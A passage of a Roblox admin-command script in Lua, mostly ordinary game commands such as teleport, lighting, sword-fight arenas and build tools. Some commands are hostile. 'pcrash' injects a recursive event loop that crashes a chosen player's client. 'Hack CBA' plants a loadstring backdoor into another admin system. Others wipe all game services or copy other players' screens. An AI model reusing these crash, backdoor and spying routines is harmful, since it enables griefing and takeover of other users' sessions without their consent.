  2952. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2953. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2954. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2955. end )
  2956. YourCommand('Personal crash','pcrash',6,
  2957.         function(Msg,Speaker) for a,b in pairs(GetPlayers(Msg,Speaker)) do CreateLocalScript([[
  2958.                   local function EventBufferOverflow(object)
  2959.                             object.DescendantAdded:connect(EventBufferOverflow)
  2960.                  Instance.new("IntValue", object)
  2961.              end
  2962.                     EventBufferOverflow(Game)]],b.Backpack) end end
  2963. )
  2964. YourCommand('Clean all','cleanall',6,
  2965.         function(Msg,Speaker)
  2966.                 CreateLocalScript("workspace:ClearAllChildren()",Speaker.Backpack)
  2967.                 function CleanAll()    
  2968.                 Objects = {}
  2969.                 for _,v in pairs(Services) do
  2970. NewOutput("Indexing "..v.Name..".",'White',Speaker,3)
  2971. for _,a in pairs(v:GetChildren()) do
  2972. table.insert(Objects,a)
  2973. end
  2974. end
  2975. NUM = #Objects
  2976. for i=1,10 do
  2977. print("Indexing descendants level "..i.."/10 of objects.")
  2978. print("Total indexed items : "..#Objects)
  2979. for _,v in pairs(Objects) do
  2980. for _,a in pairs(v:GetChildren()) do
  2981. table.insert(Objects,a)
  2982. end
  2983. end
  2984. end
  2985.  
  2986. for _,v in pairs(Objects) do
  2987. pcall(function() v:Destroy() end)
  2988. end
  2989. end
  2990.                        
  2991.         function Clean(parent)
  2992.     for _, child in ipairs(parent:getChildren()) do
  2993.         if child.ClassName == "Model" or child.ClassName == "Part" or child.ClassName == "Script" then
  2994.                 child:Destroy()
  2995.         else
  2996.             Clean(child)
  2997.         end
  2998.     end
  2999. end
  3000. Clean(workspace)
  3001. local Base = Instance.new("Part",Services.Workspace)
  3002.                 Base.Name = "BasePlate"
  3003.                 Base.Anchored = true
  3004.                 Base.Locked = true
  3005.                 Base.BrickColor = BrickColor.new("Bright green")
  3006.                 Base.Size = Vector3.new(2048,2,2048)
  3007.                 Base.CFrame = CFrame.new(0,0,0)
  3008.                 for _,v in pairs(GetPlayers()) do
  3009.                         v:LoadCharacter()
  3010.                  end
  3011.         end
  3012. )
  3013. YourCommand("Sword Fight",'sf',1,
  3014.     function(Msg,Speaker)
  3015.    Split = Msg:find(YourBet2)            
  3016.         send  = GetPlayers(string.sub(Msg,1,Split - 1),Speaker)
  3017.         to = GetPlayers(string.sub(Msg,Split+1),Speaker)
  3018.         for _,a in pairs(send) do
  3019.             for _,b in pairs(to) do
  3020.     a.Backpack:ClearAllChildren()
  3021.     b.Backpack:ClearAllChildren()
  3022.     a.Character.Humanoid.Health=100
  3023.     b.Character.Humanoid.Health=100
  3024.     m = Instance.new("Message",Workspace)
  3025.     m.Text = ''..a.Name..' VS '..b.Name..'!'
  3026.     wait(4)
  3027.     m:remove()  game:GetService("InsertService"):LoadAsset(18017365):children()[1].Parent=a.Backpack
  3028. game:GetService("InsertService"):LoadAsset(11453385):children()[1].Parent=a.Backpack
  3029. game:GetService("InsertService"):LoadAsset(11419319):children()[1].Parent=a.Backpack
  3030.  
  3031. game:GetService("InsertService"):LoadAsset(18017365):children()[1].Parent=b.Backpack
  3032. game:GetService("InsertService"):LoadAsset(11453385):children()[1].Parent=b.Backpack
  3033. game:GetService("InsertService"):LoadAsset(11419319):children()[1].Parent=b.Backpack
  3034.                 pcall(function()
  3035.     a.Character.Torso.CFrame=CFrame.new(-301.5, 1.8, -82.9)
  3036.     b.Character.Torso.CFrame=CFrame.new(-296.5, 1.8, -0.9)
  3037. Msg = Instance.new("Message",Workspace)
  3038. b.Character.Humanoid.Died:connect(function()
  3039.                                         Msg.Text = a.Name.." Has Won The Round!"
  3040.                                         wait(4)
  3041.                                         Msg:remove()
  3042.                                 wait(.1)
  3043.                                 b.Character = k.Character
  3044.                                 a.Character = l.Character
  3045.                                 l:LoadChracter()
  3046.                                
  3047. end)
  3048. lel = Instance.new("Message",Workspace)
  3049. a.Character.Humanoid.Died:connect(function()
  3050.                                         lel.Text = l.Name.." Has Won The Round!"
  3051.                                         wait(4)
  3052.                                         lel:remove()
  3053.                                 wait(.1)
  3054.                                 a.Character = k.Character
  3055.                                 b.Character = l.Character
  3056.                                 l:LoadCharacter()
  3057.                                 end)
  3058.                         end)
  3059.                 end
  3060.         end
  3061. end)
  3062. YourCommand('Loop delete','pdel',5,
  3063.   function(Msg,Speaker)
  3064. Delay(0,function()
  3065. while wait() do
  3066.  for _,Item in pairs(game.Workspace:GetChildren()) do
  3067. if Item.Name:lower():find(Msg:lower()) or Item.Name:find(Msg) then
  3068. Item:Destroy()
  3069. end
  3070.  end
  3071. end
  3072. end)
  3073.  end
  3074.  )
  3075. YourCommand("Team Sword Fight",'tsf',1,
  3076.     function(Msg,Speaker)
  3077.    Split = Msg:find(YourBet2)    
  3078.     send={}
  3079.     to={}  
  3080.     if Msg == 'random' then
  3081.         for _,v in pairs(game.Players:GetPlayers()) do
  3082.             r=math.random(1,2) if r ==1 and send[v.Name]==nil and #to == #send then send[v.Name]={Player=v} else to[v.Name]={Player=v} end
  3083.             if r == 2 and to[v.Name]==nil and #to == #send then to[v.Name]={Player=v} else send[v.Name]={Player=v} end  
  3084.         end
  3085.     else    
  3086.         send  = GetPlayers(string.sub(Msg,1,Split - 1),Speaker)
  3087.         to = GetPlayers(string.sub(Msg,Split+1),Speaker)
  3088.     end
  3089.     Team1={}
  3090.     Team2={}
  3091.     List1=""
  3092.     List2=""
  3093.     for _,v in pairs(send) do if type(v)~='table' then table.insert(Team1,v) if #List1 == 0 then List1 = List1 .. ' ' .. v.Name else List1 = List1 .. ', ' .. v.Name end else table.insert(Team1,v.Player) if #List1 == 0 then List1 = List1 .. ' ' .. v.Name else List1 = List2 .. ', ' .. v.Player.Name end end end
  3094.            
  3095.     for _,v in pairs(to) do if type(v) ~='table' then table.insert(Team2,v) if #List2 == 0 then List2 = List2 .. ' ' .. v.Name else List2 = List2 .. ', ' .. v.Name end else table.insert(Team2,v.Player) if #List2 == 0 then List2 = List2 .. ' ' .. v.Name else List2 = List2 .. ', ' .. v.Player.Name end end end
  3096.     for _,a in pairs(send) do
  3097.     a.Backpack:ClearAllChildren()
  3098.     a.Character.Humanoid.Health=100
  3099.     game:GetService("InsertService"):LoadAsset(18017365):children()[1].Parent=a.Backpack
  3100. game:GetService("InsertService"):LoadAsset(11453385):children()[1].Parent=a.Backpack
  3101. game:GetService("InsertService"):LoadAsset(11419319):children()[1].Parent=a.Backpack
  3102.                 pcall(function()
  3103.     a.Character.Torso.CFrame=CFrame.new(-301.5 , 1.8, -82.9)
  3104. end)
  3105. end
  3106.     for _,b in pairs(to) do
  3107. b.Backpack:ClearAllChildren()
  3108. b.Character.Humanoid.Health=100
  3109. game:GetService("InsertService"):LoadAsset(18017365):children()[1].Parent=b.Backpack
  3110. game:GetService("InsertService"):LoadAsset(11453385):children()[1].Parent=b.Backpack
  3111. game:GetService("InsertService"):LoadAsset(11419319):children()[1].Parent=b.Backpack
  3112. b.Character.Torso.CFrame=CFrame.new(-296.5, 1.8, -0.9)
  3113. end
  3114. Msg=Instance.new('Message',Services.Workspace)
  3115. Msg.Text=List1 .. ' VS ' .. List2
  3116. wait(2)
  3117. Msg:Destroy()
  3118. end)
  3119. YourCommand("No SF","nosf",1,
  3120.     function(Msg,Speaker)
  3121.            game.Workspace['Fades Cage']:remove()
  3122. b=Instance.new("Part",Workspace)
  3123. b.Size=Vector3.new(2000,3,2000)
  3124. b.Color=Color3.new(.5,.5,.5)
  3125. b.Anchored=true
  3126. b.Transparency=.3
  3127. b.Locked=true
  3128.         end
  3129. )
  3130. YourCommand("Sword Fight map",'map',1,
  3131.     function(Msg,Speaker)
  3132.     h=Instance.new("Hint",Workspace)
  3133.     h.Text='[Sword Fight] game is active V3'
  3134.     wait()
  3135.     q=Instance.new("Model",workspace)
  3136.    q.Name='Fades Cage'
  3137. h=Instance.new("Part",q)
  3138. h.Size=Vector3.new(63, 28.8, 1)
  3139. h.CFrame=CFrame.new(-302, 14.6, -89.4)
  3140. h.Anchored=true
  3141. h.Locked=true
  3142. h.Transparency=.8
  3143. h.Color=Color3.new(0.5,0.5,0.5)
  3144. Light = Instance.new("PointLight",h)
  3145. Light.Range = 25
  3146. Light.Color = Color3.new(1)
  3147. Light.Enabled = true
  3148. Light.Brightness = 25
  3149.  y=Instance.new("Part",q)
  3150.  y.Size=Vector3.new(63, 0.2, 96.2)
  3151.  y.CFrame=CFrame.new(-302, 0.1, -42)
  3152.  y.Anchored=true
  3153.  y.Locked=true
  3154.  y.Transparency=.8
  3155.  y.Color=Color3.new(0.5,0.5,0.5)
  3156. Light = Instance.new("PointLight",y)
  3157. Light.Range = 25
  3158. Light.Color = Color3.new(1)
  3159. Light.Enabled = true
  3160. Light.Brightness = 25
  3161.   s=Instance.new("Part",q)
  3162.   s.Size=Vector3.new(1, 28.8, 96)
  3163.   s.CFrame=CFrame.new(-271, 14.6, -41.9)
  3164.   s.Anchored=true
  3165.   s.Locked=true
  3166.   s.Transparency=.8
  3167.   s.Color=Color3.new(0.5,0.5,0.5)
  3168. Light = Instance.new("PointLight",s)
  3169. Light.Range = 25
  3170. Light.Color = Color3.new(1)
  3171. Light.Enabled = true
  3172. Light.Brightness = 25
  3173.    u=Instance.new("Part",q)
  3174.    u.Size=Vector3.new(63, 28.8, 1)
  3175.    u.CFrame=CFrame.new(-302, 14.6, 5.6)
  3176.    u.Anchored=true
  3177.    u.Locked=true
  3178.    u.Transparency=.8
  3179.    u.Color=Color3.new(0.5,0.5,0.5)
  3180. Light = Instance.new("PointLight",u)
  3181. Light.Range = 25
  3182. Light.Color = Color3.new(1)
  3183. Light.Enabled = true
  3184. Light.Brightness = 25
  3185.     o=Instance.new("Part",q)
  3186.     o.Size=Vector3.new(1, 28.8, 96)
  3187.     o.CFrame=CFrame.new(-334, 14.6, -41.9)
  3188.     o.Anchored=true
  3189.     o.Locked=true
  3190.     o.Transparency=.8
  3191.     o.Color=Color3.new(0.5,0.5,0.5)
  3192. Light = Instance.new("PointLight",o)
  3193. Light.Range = 25
  3194. Light.Color = Color3.new(1)
  3195. Light.Enabled = true
  3196. Light.Brightness = 25
  3197.      m=Instance.new("Part",q)
  3198.      m.Size=Vector3.new(64, 1.2, 96)
  3199.      m.CFrame=CFrame.new(-302.5, 29.6, -41.9)
  3200.      m.Anchored=true
  3201.      m.Locked=true
  3202.      m.Transparency=.8
  3203.      m.Color=Color3.new(0.5,0.5,0.5)
  3204. Light = Instance.new("PointLight",m)
  3205. Light.Range = 25
  3206. Light.Color = Color3.new(1)
  3207. Light.Enabled = true
  3208. Light.Brightness = 25
  3209. game.Workspace.Base:remove()
  3210. b=Instance.new("Part",q)
  3211. b.Size=Vector3.new(2000,3,2000)
  3212. b.Anchored=true
  3213. b.Color=Color3.new(0,0,0)
  3214. b.Transparency=.5
  3215. b.Locked=true
  3216. b.CFrame=CFrame.new(-302.5, 0, -41.9)
  3217. s=Instance.new("SpawnLocation",q)
  3218. s.Size=Vector3.new(4,.1,4)
  3219. s.Color=Color3.new(1,1,1)
  3220. s.Anchored = true
  3221. s.Locked = true
  3222. s.Transparency=.3
  3223. s.CFrame=CFrame.new(-265.5, 0.8007, -29.9)
  3224. end
  3225. )
  3226. YourCommand("Control","control",1,
  3227.     function(Msg,Speaker)
  3228.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3229.             pcall(function()
  3230.                 Speaker.Character = v.Character
  3231.             end)
  3232.         end
  3233. if Speaker.Parent == nil then
  3234.         CreateLocalScript([[ for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3235.  if v.Character ~= nil then
  3236.  LocalPlayer = v.Character
  3237.  game.Workspace.CurrentCamera.CameraSubject = v.Character.Humanoid
  3238.          game.Workspace.CurrentCamera.CameraType = "Custom" end end]],Speaker:FindFirstChild("Backpack") or Speaker:FindFirstChild("PlayerGui") or Speaker.Character)
  3239.         end
  3240.     end
  3241. )
  3242.  
  3243.  
  3244. YourCommand("Clear Camera","clearcam",1,
  3245.     function(Msg,Speaker)
  3246.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3247.           Sonicshadow =  CreateLocalScript("workspace.CurrentCamera:ClearAllChildren()",v.Backpack)
  3248. if not Sonicshadow then
  3249.         Output('Needs Local Source','Red',Speaker)
  3250.         end
  3251.         end
  3252.     end
  3253. )
  3254.  
  3255. YourCommand("Brightness","brightness",1,
  3256.     function(Msg,Speaker)
  3257.     RemoveTablets(Speaker)
  3258.        Services.Lighting.Brightness = tonumber(Msg)
  3259.     end
  3260. )
  3261. YourCommand("Time","time",1,
  3262.     function(Msg,Speaker)
  3263.         Services.Lighting.TimeOfDay = Msg
  3264.     end
  3265. )
  3266. YourCommand("Fog End","fogend",1,
  3267.     function(Msg,Speaker)
  3268.         Services.Lighting.FogEnd = Msg
  3269.     end
  3270. )
  3271. YourCommand("Fog Start","fogstart",1,
  3272.     function(Msg,Speaker)
  3273.         Services.Lighting.FogStart = Msg
  3274.     end
  3275. )
  3276.  
  3277. YourCommand("Fog Color","fogcolor",1,
  3278.     function(Msg,Speaker)
  3279.         if Msg == "red" then Color = Colors.Red
  3280.             elseif Msg == "black" then Color = Colors.Black
  3281.             elseif Msg == "white" then Color = Colors.White
  3282.             elseif Msg == "orange" then Color = Colors.Orange
  3283.             elseif Msg == "green" then Color = Colors.Green
  3284.             elseif Msg == "blue" then Color = Colors.Blue
  3285.         end
  3286.         Services.Lighting.FogColor = Color
  3287.     end
  3288. )
  3289.  
  3290. YourCommand("Remove Hats","rhats",1,
  3291.     function(Msg,Speaker)
  3292.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3293.             pcall(function()
  3294.                 for _,part in pairs(v.Character:GetChildren()) do if part:IsA("Hat") then part:Remove() end end
  3295.             end)
  3296.         end
  3297.     end
  3298. )
  3299. YourCommand('View','view',1,
  3300.     function(Msg,Speaker)
  3301.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3302.  
  3303. local work = {}
  3304. local guiget = Instance.new("ScreenGui",v.PlayerGui)
  3305. local frame = Instance.new("Frame",guiget) frame.Size = UDim2.new(0, 300 , 0 , 1500) frame.Position = UDim2.new(0 , 300 , 0 , 300)
  3306. frame.Active = true frame.Draggable = true frame.BackgroundColor3 = BrickColor.new("Really black").Color
  3307. local txtlabel = Instance.new("TextLabel",frame)
  3308. txtlabel.Size = UDim2.new(0 , 300 , 0 , 1500) txtlabel.TextWrapped = true  txtlabel.FontSize = "Size14"
  3309. txtlabel.Font = "ArialBold" txtlabel.TextColor3 = BrickColor.new("Really black").Color txtlabel.TextXAlignment = "Left"
  3310. txtlabel.TextYAlignment = "Top" txtlabel.Position = UDim2.new(0 , 0 , 0 , 20)
  3311. local txtlabel2 = Instance.new("TextLabel",frame)
  3312. txtlabel2.Size = UDim2.new(0 , 300 , 0 , 20) txtlabel2.TextWrapped = true  txtlabel2.FontSize = "Size14" txtlabel2.TextColor3 = BrickColor.new("White").Color
  3313. txtlabel2.BackgroundColor3 = BrickColor.new("Really black").Color txtlabel2.Text = "Click Anywhere To Drag" txtlabel2.Font = "ArialBold"
  3314. local d = game.Workspace:GetChildren()
  3315. local close = Instance.new("TextButton",frame) close.Size = UDim2.new(0 , 30 , 0 , 30) close.FontSize = "Size18" close.TextColor3 = BrickColor.new("White").Color
  3316. close.BackgroundColor3 = BrickColor.new("Bright red").Color close.Text = "X" close.Font = "ArialBold" close.Position = UDim2.new(0 , 300 , 0 , 0)
  3317. close.MouseButton1Down:connect(function(closed) guiget:Destroy() end)
  3318. for i = 1 , #d do table.insert(work,d[i].Name..":ClassName("..d[i].className..") ".." ") end wait(.1) txtlabel.Text = table.concat(work)
  3319.  
  3320. end
  3321.     end
  3322. )
  3323. YourCommand("Screen Peek","peek",1,
  3324.     function(Msg,Speaker)
  3325.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3326.             for _,GUI in pairs(v.PlayerGui:children()) do
  3327.                 GUI:Clone().Parent = Speaker.PlayerGui
  3328.             end
  3329.         end
  3330.     end
  3331. )
  3332. YourCommand("SB help","sbhelp",0,
  3333.     function(Msg,Speaker)
  3334.          Output("=~= SCRIPT BUILDER HELP =~=","Yellow",Speaker)
  3335.         Output("1. create".."/name if local then crea".."te/name/l".."ocal)","White",Speaker)
  3336.         Output("2. edit".."/name","White",Speaker)
  3337.         Output("3. -- script code --","White",Speaker)
  3338.         Output("4. exit".."/","White",Speaker)
  3339.         Output("5. run".."/name","White",Speaker)
  3340. end
  3341. )
  3342. YourCommand("Nuke a Player","nuke",5,
  3343.     function(Msg,Speaker)
  3344.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3345.             local Position = v.Character.Torso.Position
  3346.         local Sound = Instance.new("Sound",game.Workspace)
  3347.         Sound.SoundId = "http://www.roblox.com/Asset/?id=2101159"
  3348.         Sound.Volume = 1
  3349.         Sound.Pitch = math.random(90, 110) / 100
  3350.         Sound:Play()
  3351.         local Sound = Instance.new("Sound",game.Workspace)
  3352.         Sound.SoundId = "http://www.roblox.com/Asset/?id=3087031"
  3353.         Sound.Volume = 1
  3354.         Sound.Pitch = math.random(90, 110) / 100
  3355.         Sound:Play()
  3356.         for i = 1, math.random(5, 7) do
  3357.                 local ExplosionBall = Instance.new("Part", game:service("Workspace"))
  3358.                 ExplosionBall.Name = "Explosion Ball"
  3359.                 ExplosionBall.formFactor = "Custom"
  3360.                 ExplosionBall.TopSurface = 0
  3361.                 ExplosionBall.BottomSurface = 0
  3362.                 ExplosionBall.Anchored = true
  3363.                 ExplosionBall.CanCollide = false
  3364.                 ExplosionBall.Size = Vector3.new(1, 1, 1)
  3365.                 ExplosionBall.BrickColor = BrickColor.random()
  3366.                 ExplosionBall.CFrame = CFrame.new(Position)
  3367.                 ExplosionBall.Touched:connect(function(part) if part:IsDescendentOf(v.Character) then part:BreakJoints() end end)
  3368.                 Instance.new("SpecialMesh", ExplosionBall).MeshType = "Sphere"
  3369.                 coroutine.wrap(function()
  3370.                         for i = 0, 1, 0.005 do
  3371.                                 ExplosionBall.Transparency = (1 - i)
  3372.                                 ExplosionBall.Mesh.Scale = Vector3.new(i * 250, i * 250, i * 250)
  3373.                                 ExplosionBall.CFrame = CFrame.new(Position + (Vector3.new(math.random(-50, 50), math.random(-50, 50), math.random(-50, 50)) * i))
  3374.                                 if math.random(1, 25) == 1 then
  3375.                                         local Explosion = Instance.new("Explosion")
  3376.                                         Explosion.Position = ExplosionBall.Position + (Vector3.new(math.random(-50, 50), math.random(-50, 50), math.random(-50, 50)) * i)
  3377.                                         Explosion.BlastPressure = 10000 * i
  3378.                                         Explosion.BlastRadius = i * 250
  3379.                                         Explosion.Parent = game:service("Workspace")
  3380.                                 end
  3381.                                 wait()
  3382.                         end
  3383.                         for i = 0, 1, 0.05 do
  3384.                                 ExplosionBall.Transparency = i
  3385.                                 ExplosionBall.CFrame = CFrame.new(Position + (Vector3.new(math.random(-50, 50), math.random(-50, 50), math.random(-50, 50)) * (1 - i)))
  3386.                                 wait()
  3387.                         end
  3388.                         ExplosionBall:Remove()
  3389.                 end)()
  3390.         end
  3391.         end
  3392.     end
  3393. )
  3394. YourCommand('Antikill','ak',7,
  3395.         function(Msg,Speaker)
  3396.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3397.  Delay(0, function()
  3398.                 local player = v
  3399.                 local pos = CFrame.new()
  3400.                 local pause = false
  3401.                 Delay(0, function()
  3402.                     while not close do
  3403.                         wait()
  3404.                         if not pause then
  3405.                             local c = player.Character
  3406.                             if c then
  3407.                                 local t = c:findFirstChild("Torso")
  3408.                                 if t then
  3409.                                     pos = t.CFrame
  3410.                                 end
  3411.                             end
  3412.                         end
  3413.                    end
  3414.                 end)
  3415.                 player.CharacterAdded:connect(function(c)
  3416.                     if not close then
  3417.                         pause = true
  3418.                         repeat wait() until c:findFirstChild("Torso") and c:findFirstChild("Humanoid")
  3419.                         c:findFirstChild("Torso").CFrame = pos
  3420.                         c:findFirstChild("Humanoid").Died:connect(function()
  3421.                             player:LoadCharacter()
  3422.                         end)
  3423.                         pause = false
  3424.                     end
  3425.                 end)
  3426.                 pcall(function() player.Character:BreakJoints() end)
  3427.             end)
  3428.         end
  3429.     end
  3430. )
  3431.  
  3432. YourCommand('Reverse','reverse',1,
  3433.     function(Msg,Speaker)
  3434.         for _,v in pairs(GetPlayers(Msg,Speaker)) do    
  3435.             pcall(function()
  3436.                 v.Character:findFirstChild('Humanoid').WalkSpeed = -16
  3437.             end)
  3438.         end
  3439.     end
  3440. )
  3441. YourCommand("Get Build Tools","getbtools",1,
  3442.     function(Msg,Speaker)
  3443.        local BuildTools = {73089166, 73089204, 73089190, 58880579, 60791062, 73089239, 18474459, 36334760, 58901534, 16975388, 58901405, 58901575}
  3444.         local a = GetPlayers(Msg,Speaker)
  3445.         for i,v in pairs(a) do
  3446.         if v:findFirstChild("Backpack") then
  3447.         for q,w in ipairs(BuildTools) do
  3448.                 local ins = game:GetService("InsertService"):LoadAsset(w)
  3449.         for _,b in pairs(ins:GetChildren()) do
  3450.                         b.Parent = v.Backpack
  3451.                         ins:Destroy()
  3452.                 end
  3453.         end
  3454.         end
  3455. end
  3456.         end
  3457. )
  3458. YourCommand('Hack CBA','hackcba',4,
  3459. function(Msg,Speaker)
  3460.          CBAHACK = [[game:GetService("Lighting").ChildAdded:connect(function(child)
  3461.                         if child.Name == "CBA Attachment" and child:IsA("StringValue") then
  3462.                                 ypcall(loadstring(child.Value))
  3463.                         end
  3464.                         end)]]
  3465. local p = Instance.new("StringValue")
  3466. local lp,eu = loadstring(CBAHACK)
  3467. local CBA=Instance.new("StringValue")
  3468. CBA.Name="CBA Attachment"
  3469. CBA.Value=[[CBA.override=true;]]
  3470. CBA.Parent = Services.Workspace
  3471. wait()
  3472. CBA:Destroy()
  3473. end
  3474. )
  3475. YourCommand("Freeze","freeze",1,
  3476.     function(Msg,Speaker)
  3477.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3478.             v.Character.Torso.Anchored = true
  3479.            
  3480.         end
  3481.     end
  3482. )
  3483. YourCommand("Thaw","thaw",1,
  3484.     function(Msg,Speaker)
  3485.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3486.             v.Character.Torso.Anchored = false
  3487.            
  3488.         end
  3489.     end
  3490. )
  3491. YourCommand('Skydive','sky',2,
  3492.     function(Msg,Speaker)
  3493.         for _,v in pairs(GetPlayers(Msg,Speaker)) do              
  3494. v.Character.Torso.CFrame = CFrame.new(Vector3.new(1,780,1))
  3495.         end
  3496.     end
  3497. )
  3498. YourCommand('Make Private Base','pribase',3,
  3499.     function(Msg,Speaker)
  3500.  modl = Instance.new('Model',game.Workspace)
  3501.  local PB = Instance.new("Part",modl)
  3502.  NewOutput('Creating Your Base','Random',2,Speaker)
  3503.  Wait()
  3504.  PB.Name = "PB"
  3505.  PB.Anchored = true
  3506.  PB.Locked = true
  3507.  PB.BrickColor = BrickColor.new("Royal purple")
  3508.  PB.Size = Vector3.new(50,1,50)
  3509.  PB.CFrame = CFrame.new(0,1000,0)
  3510.  pchar = Instance.new('Part',modl)
  3511.  pchar.Locked = true
  3512.  pchar.Anchored = true
  3513.  pchar.CanCollide = false
  3514.  pchar.Transparency = 1
  3515.  pchar.CFrame = CFrame.new(0,1020,0)
  3516.  Wait()
  3517.  NewOutput('Created Private Base','Random',3,Speaker)
  3518.  Wait()
  3519.  Speaker.Character.Torso.CFrame = CFrame.new(0,1030,0)
  3520. end
  3521. )
  3522.  
  3523. YourCommand('Clean','clean',5,
  3524.     function(Msg,Speaker)
  3525. if Msg == "" then
  3526.                 for _,ser in pairs(Services) do
  3527.                         Output('Clean: ' .. ser.Name .. ' ?',Color3.new(0,1,0),Speaker,nil,
  3528.                                 function()
  3529.                                         for _,Item in pairs(ser:GetChildren()) do
  3530.                                                 if Item ~= script and Item.Name ~= 'Terrain' then
  3531.                                                         Item:Destroy()
  3532.                                                 end
  3533.                                         end
  3534.                                         if ser.Name == 'Workspace' then
  3535.                                         local B = Instance.new('Part',Workspace)
  3536.                                         B.Anchored = true
  3537.                                         B.Size = Vector3.new(1000,0,1000)
  3538.                                         B.Material = 'Grass'
  3539.                                         B.BrickColor = BrickColor.new('Dark green')
  3540.                                         B.Name = 'Base'
  3541.                                         RemoveTablets(Speaker)
  3542.                                         for _,Player in pairs(Game.Players:GetPlayers()) do
  3543.                                                 Player:LoadCharacter(true)
  3544.                                         end
  3545.                                         end
  3546.                                         Output('Cleaned ' .. ser.Name,'Green',Speaker)
  3547.                                 end
  3548.                         )
  3549.                 end
  3550.         else
  3551.                 local ser = game:service(Msg)
  3552.                 if ser ~= nil then
  3553.                                                 Output('Clean: ' .. ser.Name .. ' ?',Color3.new(0,1,0),Speaker,nil,
  3554.                                 function()
  3555.                                         for _,Item in pairs(ser:GetChildren()) do
  3556.                                                 if Item ~= script and Item.Name ~= 'Terrain' then
  3557.                                                         Item:Destroy()
  3558.                                                 end
  3559.                                         end
  3560.                                         if ser.Name == 'Workspace' then
  3561.                                         local B = Instance.new('Part',Workspace)
  3562.                                         B.Anchored = true
  3563.                                         B.Size = Vector3.new(1000,0,1000)
  3564.                                         B.Material = 'Grass'
  3565.                                         B.BrickColor = BrickColor.new('Dark green')
  3566.                                         B.Name = 'Base'
  3567.                     RemoveTablets(Speaker)
  3568.                                         for _,Player in pairs(Game.Players:GetPlayers()) do
  3569.                                                 Player:LoadCharacter(true)
  3570.                                         end
  3571.                                         end
  3572.                                         Output('Cleaned ' .. ser.Name,'Green',Speaker)
  3573.                                        
  3574.                                 end
  3575.                                                 )
  3576.                 else
  3577.                         Output('That service needs to be capital : ' .. Msg,'Red',Speaker)
  3578.                 end
  3579.         end
  3580. end
  3581. )
  3582. YourCommand('@','@',0,
  3583.     function(Msg,Speaker)
  3584.         Split = Msg:find(YourBet2)
  3585.         for _,v in pairs(GetPlayers(Msg:sub(1,Split-1),Speaker)) do
  3586.             OnChatted(Msg:sub(Split),v)
  3587.         end
  3588.     end
  3589. )
  3590. YourCommand("Teleport","tp",1,
  3591.     function(Msg,Speaker)
  3592.         local Split = Msg:find(YourBet2)
  3593.         local From = GetPlayers(Msg:sub(1,Split-1),Speaker)
  3594.         local To = GetPlayers(Msg:sub(Split+1),Speaker)[1]
  3595.         local Current = 0
  3596.         for i=-180,180,360/#From do
  3597.             Current = Current + 1
  3598.             pcall(function()
  3599.                 if From[Current] ~= To then
  3600.                     From[Current].Character.Torso.CFrame = To.Character.Torso.CFrame
  3601.                         * CFrame.Angles(0,math.rad(i),0)
  3602.                         * CFrame.new(0,0,5 + (#From*1.1))
  3603.                 end
  3604.             end)
  3605.         end
  3606.     end
  3607. )
  3608. YourCommand('Reset YourBets','rBets',5,
  3609.         function(Msg,Speaker)
  3610. YourBet = "/"
  3611. YourBet2="/"
  3612. end
  3613. )      
  3614. YourCommand('Change YourBet','YourBet',5,
  3615.         function(Msg,Speaker)
  3616.                 YourBetS = {YourBet2,';','*','-','_','[',']','\\'}
  3617.                     for _,YourBet in pairs(YourBetS) do
  3618.                             Output(YourBet,"Random",Speaker,nil,
  3619.                                 function()
  3620.                                     YourBet = YourBet YourBet2= YourBet
  3621.                                         Output('New YourBet key is ' .. YourBet,"Red",Speaker)
  3622.                                     RemoveTablets(Speaker)
  3623.                                 end
  3624.                             )
  3625.                     end
  3626.         end
  3627. )
  3628. YourCommand("Debug","debug",1,
  3629.     function(Msg,Speaker)
  3630.         Services.Lighting.Ambient = Color3.new(1,1,1)
  3631.         Services.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  3632.         Services.Lighting.ColorShift_Top = Color3.new(0,0,0)
  3633.         Services.Lighting.ShadowColor = Color3.new(0.69,0.69,0.69)
  3634.         Services.Lighting.Brightness = 0.5
  3635.         Services.Lighting.FogStart = 0
  3636.         Services.Lighting.FogEnd = 100000
  3637.         Services.Lighting.FogColor = Color3.new(0.74,0.74,0.74)
  3638.         Services.Lighting.TimeOfDay = 12
  3639.         pcall(function() Services.Lighting.Sky:Remove() end)
  3640.         pcall(function()
  3641.             CreateLocalScript([[
  3642.                 LocalPlayer = game:service'Players'.LocalPlayer
  3643.                 LocalPlayer.CameraMode = Enum.CameraMode.Classic
  3644.                 Camera = workspace.CurrentCamera
  3645.                 Camera:SetRoll(0)
  3646.                 Camera.CameraType = "Custom"
  3647.                 Camera.FieldOfView = 70
  3648.                 Camera.CameraSubject = game.Players.LocalPlayer.Character.Humanoid
  3649.             ]],Speaker.Backpack)
  3650.         end)
  3651.    
  3652.         for _,v in pairs(Services) do    v.Name = v.className end
  3653.         for _,v in pairs(GetPlayers()) do v.CharacterAppearance = "http://www.roblox.com/Asset/CharacterFetch.ashx?userId="..v.userId  end pcall(function() Speaker.Character.Torso.Velocity = Vector3.new(0,0,0) end)
  3654.        
  3655.         if #Services.Teams:GetChildren() == 0 then
  3656.             for _,v in pairs(GetPlayers()) do
  3657.                 v.Neutral = true
  3658.             end
  3659.         end
  3660.  
  3661.     end
  3662. )
  3663.  
  3664.  
  3665. YourCommand("Message","m",1,
  3666.     function(Msg,Speaker)
  3667.         Msg = Msg:gsub("\t"," ")
  3668.         Msg = Msg:gsub("\n"," ")
  3669.         Msg = "["..Speaker.Name.."]\t"..Msg
  3670.         local v = Instance.new("Message",Services.Workspace)
  3671.         for i=0,#Msg,0.3 do
  3672.             v.Text = (
  3673.                 function()
  3674.                     local Rtn = Msg:sub(0,i)
  3675.                     repeat
  3676.                         Rtn = Rtn .. tostring(string.char(math.random(48,57))) -- 37 127
  3677.                     until #Rtn >= #Msg
  3678.                     return Rtn:sub(1,#Rtn-1)
